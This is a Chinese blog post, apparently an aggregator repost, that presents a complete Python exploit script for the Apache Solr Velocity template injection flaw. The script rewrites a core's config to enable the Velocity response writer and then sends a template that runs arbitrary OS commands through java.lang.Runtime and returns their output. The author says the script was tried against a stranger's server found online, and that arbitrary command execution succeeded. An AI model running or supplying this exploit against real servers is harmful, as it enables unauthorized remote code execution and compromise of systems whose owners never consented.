hack toolsapache solr最新远程代码吗执行漏洞验证脚本
Posted 黑客信徒
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了hack toolsapache solr最新远程代码吗执行漏洞验证脚本相关的知识,希望对你有一定的参考价值。
上周末回了老家,apache solr 曝出了远程代码执行漏洞,刚写了漏洞验证程序,代码:
#coding:utf-8
import requests
import sys
def modify_core():
data = '{"update-queryresponsewriter":{"startup":"lazy","name":"velocity","class":"solr.VelocityResponseWriter","template.base.dir":"","solr.resource.loader.enabled":"true","params.resource.loader.enabled": "true"}}'
html = requests.post(url = target_config_url,data = data)
if html.status_code == 200 and 'It is likely to change in the future' in html.text.encode('utf-8'):
return True
else:
return False
def exploit(command):
host = target_config_url.split('/config')[0]
exp = host + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27'+command+'%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
html = requests.get(url = exp)
print '\n'
print html.text.encode('utf-8').strip()
if __name__ == '__main__':
if len(sys.argv) != 3:
print '\nusage: python solr_exp.py http://192.168.6.6:8983/solr/mail/config/ "whoami"'
sys.exit()
else:
target_config_url = sys.argv[1]
if modify_core():
exploit(sys.argv[2])
else:
print '\nplease check target core url'
网上找了一个老外的目标服务器测了一下,可以直接执行任意命令:
以上是关于hack toolsapache solr最新远程代码吗执行漏洞验证脚本的主要内容,如果未能解决你的问题,请参考以下文章
安全漏洞预警Apache Solr velocity模版注入